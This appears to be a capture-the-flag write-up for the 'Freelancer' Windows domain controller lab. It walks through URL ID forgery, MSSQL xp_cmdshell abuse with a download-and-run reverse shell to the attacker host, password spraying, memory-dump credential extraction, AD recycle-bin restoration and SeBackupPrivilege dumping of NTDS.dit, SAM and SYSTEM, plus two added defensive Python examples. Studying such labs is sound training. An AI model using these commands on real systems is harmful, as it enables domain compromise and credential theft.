
Week 7. Freelancer
TL;DR
This is a Windows Server 2019 machine acting as a domain controller and hosting a job search web site. User IDs are Base64 encoded in the URLs, so we can just sign up for an account and escalate to web administrator by manipulating the URL. Once in the administrator dashboard, we use an MSSQL console to escalate to the sa user and enable xp_cmdshell, which we use to get a reverse shell and collect the user flag.
Regarding escalation, we first find a memory dump in the file system; once opened with a forensics tool, we can extract several hashes from it. One of the hashes can be cracked and enables lateral movement to another user with permissions to restore AD objects from the recycle bin. We recover a deleted AD user account that in turn has SeBackupPrivilege enabled. We abuse this to back up the SAM, SYSTEM and NTDS.dit files, from which we extract the domain administrator hash.
KEYWORDS
MSSQL escalation, xp_cmdshell, MemProcFS, Pypykatz, AD recycle bin, SeBackupPrivilege, Impacket, changepasswd.py, SAM, SYSTEM, NTDS.dit, secretsdump.py.
REFERENCES
https://github.com/martinsohn/PowerShell-reverse-shell/blob/main/powershell-reverse-shell.ps1
https://github.com/ufrisk/MemProcFS
https://github.com/skelsec/pypykatz
https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960#ac58
ENUMERATION
Port scan.
> for ports in $(nmap $target -p- --min-rate=5000 -Pn --open --reason | grep open | awk -F "/" '{print $1}' | tr '\n' ',' | sed s/,$//); do nmap $target -p$ports -sV -sC -Pn -vv -n && echo "\nList of open ports: $ports";done
Starting Nmap 7.93 ( https://nmap.org ) at 2025-01-11 22:23 GMT
Nmap scan report for 10.10.11.5
Host is up, received user-set (0.058s latency).
Scanned at 2025-01-11 22:23:42 GMT for 72s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-01-12 03:26:28Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49676/tcp open msrpc syn-ack Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49680/tcp open msrpc syn-ack Microsoft Windows RPC
49685/tcp open msrpc syn-ack Microsoft Windows RPC
55297/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-01-12T03:27:35+00:00; +5h02m41s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-12T02:16:21
| Not valid after: 2055-01-12T02:16:21
| MD5: 1401da9f484054bc111cb6a5d6e013ac
| SHA-1: 318ef71538f6995e5c8bb0328bfdc6cde5756adc
63189/tcp open msrpc syn-ack Microsoft Windows RPC
63193/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 5h02m40s, deviation: 0s, median: 5h02m39s
| smb2-time:
| date: 2025-01-12T03:27:26
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 44972/tcp): CLEAN (Couldn't connect)
| Check 2 (port 53827/tcp): CLEAN (Couldn't connect)
| Check 3 (port 55524/udp): CLEAN (Failed to receive data)
| Check 4 (port 39397/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Nmap done: 1 IP address (1 host up) scanned in 72.88 seconds
List of open ports: 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49670,49676,49677,49680,49685,55297,63189,63193
It looks like a domain controller. Add freelancer.htb to the hosts file and enumerate the web site with Firefox. A job search site comes into view, where you can register a new employer account.

Fuzz for hidden content.
> ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 20 -fc 404 -e .php,.html,.txt,.md -u http://freelancer.htb/FUZZ
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://freelancer.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Extensions : .php .html .txt .md
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 20
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404
________________________________________________
about [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 389ms]
admin [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 399ms]
blog [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 394ms]
contact [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 336ms]
:: Progress: [23565/23565] :: Job [1/1] :: 51 req/sec :: Duration: [0:07:55] :: Errors: 0 ::
There is an /admin path to which we still do not have access.
USER
When you try to log in with your newly created account, it says "Account is not activated and cannot be authenticated". To bypass this, just fill in the "Forgot password" form and reset your password; you'll need your personal answers.
Reset the password and access your user dashboard, then click on "QR-Code".

Scan your QR code and inspect the URL.
It should be something like this: http://freelancer.htb/accounts/login/otp/MTAwMTA=/7e043d891429e7366518e939c521364d
Decode the Base64 part; it returns a 5-digit number.
> echo 'MTAwMTA=' | base64 -d
10010
This looks like a user ID; also, in the blog we can find the IDs of several users we could impersonate.
For example, this user has ID=10.

To impersonate him, just encode the ID=10 in Base64.
> echo '10' | base64
MTAK
Then forge a URL similar to the previous one. Just substitute the Base64 part with the new code: http://freelancer.htb/accounts/login/otp/MTAK/7e043d891429e7366518e939c521364d
Enter the URL and you are in the user's dashboard.

We can try several other IDs until we find out that ID=2 is the admin account. Base64 for "2" is "Mgo=".
Enter the URL http://freelancer.htb/accounts/login/otp/Mgo=/7e043d891429e7366518e939c521364d and you are in the admin dashboard.
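The forgery above works because the second URL component is accepted no matter which user ID the first component names. As an added example (not code from the write-up or from the Freelancer application), here is that pattern next to a hardened version that binds the token to the user ID with an HMAC; the server secret, the verifier functions and the sample IDs are assumptions made for illustration.

```python
"""Added example (not the write-up's code nor the Freelancer web app's): why the
OTP login link can be forged, and one way to bind the token to the user.
The URL shape /accounts/login/otp/<base64 id>/<token> is from the write-up; the
two verifiers, the server secret and the sample ids are constructed here."""
import base64
import binascii
import hashlib
import hmac
import secrets
import time
from typing import Optional, Set, Tuple

# Constructed secret; a real app loads this from configuration, not source code.
SERVER_SECRET = secrets.token_bytes(32)


def b64_user_id(user_id: int) -> str:
    """Encode a numeric user id the way the write-up's URLs carry it."""
    return base64.b64encode(str(user_id).encode()).decode()


def decode_user_id(b64: str) -> int:
    """Reverse b64_user_id; strips the trailing newline that 'MTAK' (echo '10') carries."""
    return int(base64.b64decode(b64).decode().strip())


# --- Vulnerable pattern: the token only proves that *some* OTP link was issued.
ISSUED_TOKENS: Set[str] = set()


def vulnerable_make_link(user_id: int) -> Tuple[str, str]:
    token = secrets.token_hex(16)
    ISSUED_TOKENS.add(token)
    return b64_user_id(user_id), token


def vulnerable_login(b64id: str, token: str) -> Optional[int]:
    """Trusts the id from the URL: swapping the Base64 part logs in as another user."""
    if token in ISSUED_TOKENS:
        return decode_user_id(b64id)
    return None


# --- Hardened pattern: token = expiry + HMAC(secret, id:expiry), single use.
USED_TOKENS: Set[str] = set()


def _mac(user_id: int, expires: int) -> str:
    return hmac.new(SERVER_SECRET, f"{user_id}:{expires}".encode(), hashlib.sha256).hexdigest()


def hardened_make_link(user_id: int, ttl: int = 600, now: Optional[float] = None) -> Tuple[str, str]:
    expires = int((time.time() if now is None else now) + ttl)
    return b64_user_id(user_id), f"{expires}.{_mac(user_id, expires)}"


def hardened_login(b64id: str, token: str, now: Optional[float] = None) -> Optional[int]:
    """Returns the user id only if the token was minted for exactly that id,
    has not expired and has not been used before."""
    try:
        user_id = decode_user_id(b64id)
        expires_str, mac = token.split(".", 1)
        expires = int(expires_str)
    except (ValueError, binascii.Error):
        return None
    if (time.time() if now is None else now) > expires or token in USED_TOKENS:
        return None
    # Constant-time comparison so the MAC cannot be guessed byte by byte.
    if not hmac.compare_digest(_mac(user_id, expires), mac):
        return None
    USED_TOKENS.add(token)
    return user_id
```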

Now we can access the /admin path we found with ffuf before. Here we find an admin dashboard where we can issue MSSQL statements.

Let's try enabling code execution.
> execute enable_xp_cmdshell;
('42000', "[42000] [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Could not find stored procedure 'enable_xp_cmdshell'. (2812) (SQLExecDirectW)")
> execute xp_cmdshell 'systeminfo';
('42000', "[42000] [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'. (229) (SQLExecDirectW)")
No luck, let's try to enable xp_cmdshell manually.
> execute sp_configure 'show advanced options', '1';
RECONFIGURE
> execute sp_configure 'xp_cmdshell', '1';
RECONFIGURE
> execute xp_cmdshell "systeminfo";
('42000', '[42000] [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]User does not have permission to perform this action. (15247) (SQLExecDirectW)')

The application returns a permissions error, so it seems we will need to escalate privileges in MSSQL.
Check whether we can impersonate the sa user:
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';

It seems we can. Now we abuse this to add ourselves to the sysadmin server role, for which we first need to know our current username.
> select user_name();
Freelancer_webapp_user
Add ourselves to the sysadmin role.
> execute as login = 'sa'
exec sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
No results. Previous SQL was not a query.
The query returns "No results", but it executes successfully.
Now we can enable command execution and test whether we can issue commands.
> execute sp_configure 'show advanced options', '1';
RECONFIGURE
> execute sp_configure 'xp_cmdshell', '1';
RECONFIGURE
No results. Previous SQL was not a query.
> execute xp_cmdshell "systeminfo";
output
null
Host Name: DC
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA664
Original Install Date: 5/28/2024, 10:25:02 AM
System Boot Time: 8/31/2024, 5:33:49 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,294 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,952 MB
Virtual Memory: In Use: 1,847 MB
Page File Location(s): C:\pagefile.sys
Domain: freelancer.htb
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.5
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
null
It works, so the next step is to send a PowerShell reverse shell.
> execute sp_configure 'show advanced options', '1';
RECONFIGURE
> execute sp_configure 'xp_cmdshell', '1';
RECONFIGURE
> exec xp_cmdshell 'powershell -c "IEX (iwr -usebasicparsing http://10.10.14.104/shell.ps1)"'
Once inside, do a bit of enumeration. In C:\users we see several usernames.
> dir
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/31/2024 5:34 PM Administrator
d----- 5/28/2024 10:23 AM lkazanof
d----- 5/28/2024 10:23 AM lorra199
d----- 5/28/2024 10:22 AM mikasaAckerman
d----- 8/27/2023 1:16 AM MSSQLSERVER
d-r--- 5/28/2024 2:13 PM Public
d----- 5/28/2024 10:22 AM sqlbackupoperator
d----- 8/31/2024 5:35 PM sql_svc
And in C:\users\sql_svc\downloads\sqlexpr-2019_x64_enu there is the configuration file sql-Configuration.INI.
> dir
Directory: C:\users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/27/2024 1:52 PM 1033_ENU_LP
d----- 5/27/2024 1:52 PM redist
d----- 5/27/2024 1:52 PM resources
d----- 5/27/2024 1:52 PM x64
-a---- 9/24/2019 9:00 PM 45 AUTORUN.INF
-a---- 9/24/2019 9:00 PM 784 MEDIAINFO.XML
-a---- 9/29/2023 4:49 AM 16 PackageId.dat
-a---- 9/24/2019 9:00 PM 142944 SETUP.EXE
-a---- 9/24/2019 9:00 PM 486 SETUP.EXE.CONFIG
-a---- 5/27/2024 4:58 PM 724 sql-Configuration.INI
-a---- 9/24/2019 9:00 PM 249448 SQLSETUPBOOTSTRAPPER.DLL
It contains the password IL0v3ErenY3ager.

Let's spray this password across the user list.
> crackmapexec winrm freelancer.htb -u ./userlist -p 'IL0v3ErenY3ager' --continue-on-success
WINRM 10.10.11.5 5985 DC [*] Windows 10.0 Build 17763 (name:DC) (domain:freelancer.htb)
WINRM 10.10.11.5 5985 DC [*] http://10.10.11.5:5985/wsman
WINRM 10.10.11.5 5985 DC [-] freelancer.htb\Administrator:IL0v3ErenY3ager "unsupported hash type md4"
WINRM 10.10.11.5 5985 DC [-] freelancer.htb\lkazanof:IL0v3ErenY3ager "unsupported hash type md4"
WINRM 10.10.11.5 5985 DC [-] freelancer.htb\lorra199:IL0v3ErenY3ager "unsupported hash type md4"
WINRM 10.10.11.5 5985 DC [-] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager "unsupported hash type md4"
WINRM 10.10.11.5 5985 DC [-] freelancer.htb\MSSQLSERVER:IL0v3ErenY3ager "unsupported hash type md4"
WINRM 10.10.11.5 5985 DC [-] freelancer.htb\sqlbackupoperator:IL0v3ErenY3ager "unsupported hash type md4"
WINRM 10.10.11.5 5985 DC [-] freelancer.htb\sql_svc:IL0v3ErenY3ager "unsupported hash type md4"
> crackmapexec smb freelancer.htb -u ./userlist -p 'IL0v3ErenY3ager' --continue-on-success
SMB 10.10.11.5 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.5 445 DC [-] freelancer.htb\Administrator:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [-] freelancer.htb\lkazanof:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [-] freelancer.htb\lorra199:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager
SMB 10.10.11.5 445 DC [-] freelancer.htb\MSSQLSERVER:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [-] freelancer.htb\sqlbackupoperator:IL0v3ErenY3ager STATUS_LOGON_FAILURE
SMB 10.10.11.5 445 DC [-] freelancer.htb\sql_svc:IL0v3ErenY3ager STATUS_LOGON_FAILURE

Nothing of interest is found in the SMB shares.
> smbmap -H freelancer.htb -u mikasaAckerman -p 'IL0v3ErenY3ager'
[+] IP: freelancer.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
But we can use the credentials to move laterally to user mikasaAckerman with RunasCs.exe.
> .\runascs.exe mikasaAckerman IL0v3ErenY3ager cmd.exe -r 10.10.14.104:9000

And from here collect the user flag.
SYSTEM
Begin from the mikasaAckerman shell and take the opportunity to enumerate the system.
> systeminfo
Host Name: DC
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
System Type: x64-based PC
On the desktop there is a text file. It says someone has created a memory dump for troubleshooting purposes.
Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to
troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the
problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately,
there was no improvement. Whenever we try to establish a remote SQL connection to
the installed instance, the server's CPU starts overheating, and the RAM usage
keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the
Datacenter and send it to you for further assistance in troubleshooting the
issue.
Best regards,
Bring the dump to your Kali machine and extract the DMP file. Open it with the MemProcFS forensics tool.
> sudo ./memprocfs -device ../MEMORY.DMP -mount /mnt/memdump -forensic 0
Initialized 64-bit Windows 10.0.17763
============================== MemProcFS ==============================
- Author: Ulf Frisk - pcileech@frizk.net
- Info: https://github.com/ufrisk/MemProcFS
- Discord: https://discord.gg/pcileech
- License: GNU Affero General Public License v3.0
---------------------------------------------------------------------
MemProcFS is free open source software. If you find it useful please
become a sponsor at: https://github.com/sponsors/ufrisk Thank You :)
---------------------------------------------------------------------
- Version: 5.9.14 (Linux)
- Mount Point: /mnt/memprocfs
- Tag: 17763_a3431de6
- Operating System: Windows 10.0.17763 (X64)
==========================================================================
In the /mnt/memdump/py/regsecrets directory there is a file called regsecrets-install.txt. It contains instructions to install the regsecrets plugin. Apart from this plugin, the Pypykatz package is also needed, so you may need to install it with pip3.
After installing both, run the memprocfs command again and navigate again to the /mnt/memdump/py/regsecrets directory. This time the tool is able to extract secrets from the dump and write them to TXT files.
FREELANCER.HTB/Administrator:*2023-10-04
12:55:34*$DCC2$10240#Administrator#67a0c0f193abd932b55fb8916692c361
FREELANCER.HTB/lorra199:*2023-10-04
12:29:00*$DCC2$10240#lorra199#7ce808b78e75a5747135cf53dc6ac3b1
FREELANCER.HTB/liza.kazanof:*2023-10-04
17:31:23*$DCC2$10240#liza.kazanof#ecd6e532224ccad2abcf2369ccb8b679
...
=== LSA Service User Secret ===
History: False
Service name: _SC_MSSQL$DATA
Username: UNKNOWN
00000000: 50 57 4e 33 44 23 6c 30 72 72 40 41 72 6d 65 73 |PWN3D#l0rr@Armes|
00000010: 73 61 31 39 39 |sa199|
The DCC2 hashes are cached domain credentials (MS Cache v2); one of them can be cracked with hashcat mode 2100. Save the password, as it will be needed later.

On the other hand, the extracted LSA secret turns out to be valid for a WinRM session as lorra199.

Start by enumerating lorra199's permissions and groups.
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
FREELANCER\AD Recycle Bin Group S-1-5-21-3542429192-2036945976-3483670807-1164 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
There is a group called FREELANCER\AD Recycle Bin. Members of this group can read and restore deleted Active Directory objects.
To abuse this privileged group, first we enumerate the deleted objects currently stored in the recycle bin.
> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties sAMAccountName
Deleted : True
DistinguishedName : CN=Deleted Objects,DC=freelancer,DC=htb
Name : Deleted Objects
ObjectClass : container
ObjectGUID : bb081f2b-bd0a-4fc7-b3e9-50e107e961ee
Deleted : True
DistinguishedName : CN=Emily Johnson\0ADEL:0c78ea5f-c198-48da-b5fa-b8554a02f3b6,CN=Deleted Objects,DC=freelancer,DC=htb
Name : Emily Johnson
DEL:0c78ea5f-c198-48da-b5fa-b8554a02f3b6
ObjectClass : user
ObjectGUID : 0c78ea5f-c198-48da-b5fa-b8554a02f3b6
sAMAccountName : ejohnson
Deleted : True
DistinguishedName : CN=James Moore\0ADEL:8194e0a3-b636-4dba-91de-317dfe34f5b5,CN=Deleted Objects,DC=freelancer,DC=htb
Name : James Moore
DEL:8194e0a3-b636-4dba-91de-317dfe34f5b5
ObjectClass : user
ObjectGUID : 8194e0a3-b636-4dba-91de-317dfe34f5b5
sAMAccountName : jmoore
Deleted : True
DistinguishedName : CN=Abigail Morris\0ADEL:80104541-085f-4686-b0a2-26a0cbd7c23c,CN=Deleted Objects,DC=freelancer,DC=htb
Name : Abigail Morris
DEL:80104541-085f-4686-b0a2-26a0cbd7c23c
ObjectClass : user
ObjectGUID : 80104541-085f-4686-b0a2-26a0cbd7c23c
sAMAccountName : abigail.morris
Deleted : True
DistinguishedName : CN=Noah Baker\0ADEL:d955e3c2-6ff5-4b66-8971-2caa60ea72c7,CN=Deleted Objects,DC=freelancer,DC=htb
Name : Noah Baker
DEL:d955e3c2-6ff5-4b66-8971-2caa60ea72c7
ObjectClass : user
ObjectGUID : d955e3c2-6ff5-4b66-8971-2caa60ea72c7
sAMAccountName : noah.baker
Deleted : True
DistinguishedName : CN=tony stark\0ADEL:e7027ba5-1921-488f-b4d8-58d7dac4aca9,CN=Deleted Objects,DC=freelancer,DC=htb
Name : tony stark
DEL:e7027ba5-1921-488f-b4d8-58d7dac4aca9
ObjectClass : user
ObjectGUID : e7027ba5-1921-488f-b4d8-58d7dac4aca9
sAMAccountName : sstark
Deleted : True
DistinguishedName : CN=Liza Kazanof\0ADEL:ebe15df5-e265-45ec-b7fc-359877217138,CN=Deleted Objects,DC=freelancer,DC=htb
Name : Liza Kazanof
DEL:ebe15df5-e265-45ec-b7fc-359877217138
ObjectClass : user
ObjectGUID : ebe15df5-e265-45ec-b7fc-359877217138
sAMAccountName : liza.kazanof
Notice that for one of the deleted objects (liza.kazanof) we have already cracked the password. So we will restore this user from the recycle bin and get a WinRM shell as her.
First we need the ObjectGUID of the deleted account.
> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties objectGUID
Deleted : True
DistinguishedName : CN=Liza Kazanof\0ADEL:ebe15df5-e265-45ec-b7fc-359877217138,CN=Deleted Objects,DC=freelancer,DC=htb
Name : Liza Kazanof
DEL:ebe15df5-e265-45ec-b7fc-359877217138
ObjectClass : user
ObjectGUID : ebe15df5-e265-45ec-b7fc-359877217138
And now we can restore the user in the AD.
> restore-ADObject -identity 'ebe15df5-e265-45ec-b7fc-359877217138' -newname "liza.kazanof"
However, if we try to connect with evil-winrm we receive an authentication error. crackmapexec explains why: the password has expired.
> crackmapexec smb freelancer.htb -u liza.kazanof -p 'RockYou!'
SMB 10.10.11.5 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.5 445 DC [-] freelancer.htb\liza.kazanof:RockYou! STATUS_PASSWORD_EXPIRED
Use Impacket's changepasswd.py to update the password.
> python3 /usr/share/doc/python3-impacket/examples/changepasswd.py freelancer.htb/liza.kazanof:'RockYou!'@freelancer.htb -newpass 'Password123!'

Now it is possible to get a shell as liza.kazanof.
> evil-winrm -u liza.kazanof -p 'Password123!' -i freelancer.htb
Enumerating her permissions, we see she has SeBackupPrivilege and SeRestorePrivilege. This means she can read (and write) any file on the system regardless of its ACL, including the SAM and SYSTEM registry hives and the Active Directory database, which is stored in the file NTDS.dit on domain controllers.
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
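As an added example (not from the write-up), the following parser reads `whoami /priv` output like the listing above and flags the privileges that bypass file ACLs, which is the point just made about SeBackupPrivilege and SeRestorePrivilege; the sample output and the risk notes are constructed for illustration, not produced by the tool.

```python
"""Added example, not from the write-up: parse `whoami /priv` output and flag the
privileges that let a token bypass file ACLs. SAMPLE_OUTPUT is constructed to
match the fixed-width format of the real command; the risk notes are my own."""
from typing import Dict, List, Optional, Tuple

# Constructed sample in the fixed-width layout `whoami /priv` prints.
SAMPLE_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# Privileges that bypass ACLs or lead to full control of the host.
RISKY_PRIVILEGES: Dict[str, str] = {
    "SeBackupPrivilege": "read any file regardless of ACL (SAM, SYSTEM, NTDS.dit)",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate tokens of connecting clients",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}


def _column_spans(ruler: str) -> List[Tuple[int, int]]:
    """Derive column boundaries from the '=====' ruler line. The last column runs
    to end of line because a value such as 'Disabled' can be wider than its ruler."""
    spans: List[Tuple[int, int]] = []
    start: Optional[int] = None
    for pos, ch in enumerate(ruler + " "):
        if ch == "=" and start is None:
            start = pos
        elif ch != "=" and start is not None:
            spans.append((start, pos))
            start = None
    spans[-1] = (spans[-1][0], -1)
    return spans


def parse_whoami_priv(text: str) -> Dict[str, Tuple[str, str]]:
    """Map privilege name -> (description, state) from `whoami /priv` output."""
    lines = text.splitlines()
    ruler_idx = next((i for i, ln in enumerate(lines) if ln.startswith("=")), None)
    if ruler_idx is None:
        raise ValueError("no column ruler found in whoami output")
    spans = _column_spans(lines[ruler_idx])
    privs: Dict[str, Tuple[str, str]] = {}
    for ln in lines[ruler_idx + 1:]:
        if not ln.strip():
            continue
        cols = [ln[s:e].strip() if e != -1 else ln[s:].strip() for s, e in spans]
        privs[cols[0]] = (cols[1], cols[2])
    return privs


def flag_risky(privs: Dict[str, Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (name, state, why) for every risky privilege held by the token.
    A 'Disabled' privilege still counts: the holder can turn it on with
    AdjustTokenPrivileges, so presence matters, not the current state."""
    return [(n, privs[n][1], RISKY_PRIVILEGES[n]) for n in privs if n in RISKY_PRIVILEGES]


if __name__ == "__main__":
    for name, state, why in flag_risky(parse_whoami_priv(SAMPLE_OUTPUT)):
        print(f"{name:28} {state:9} {why}")
```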
We will abuse this with Diskshadow and Robocopy.
In the liza.kazanof shell, create a script file for Diskshadow.
> echo "set verbose on" > script.dsh;echo "set metadata C:\Windows\Temp\meta.cab" >> script.dsh;echo "set context clientaccessible" >> script.dsh;echo "set context persistent" >> script.dsh;echo "begin backup" >> script.dsh;echo "add volume C: alias cdrive" >> script.dsh;echo "create" >> script.dsh;echo "expose %cdrive% F:" >> script.dsh;echo "end backup" >> script.dsh;echo "exit" >> script.dsh;type script.dsh
Then convert it to ASCII (PowerShell's redirection writes UTF-16), otherwise Diskshadow will not be able to read it.
> (Get-Content -Path "script.dsh") | Out-File -FilePath "script_ascii.dsh" -Encoding ascii
Now we can run the tool passing the ASCII script as an argument.
> diskshadow /s script_ascii.dsh

Then use Robocopy in backup mode (/B) to copy ntds.dit out of the exposed shadow copy (F:) into a local ntds folder.
> robocopy /B F:\Windows\NTDS .\ntds ntds.dit

Now extract the SAM and SYSTEM hives.
> reg save hklm\system system;
The operation completed successfully.
> reg save hklm\sam sam
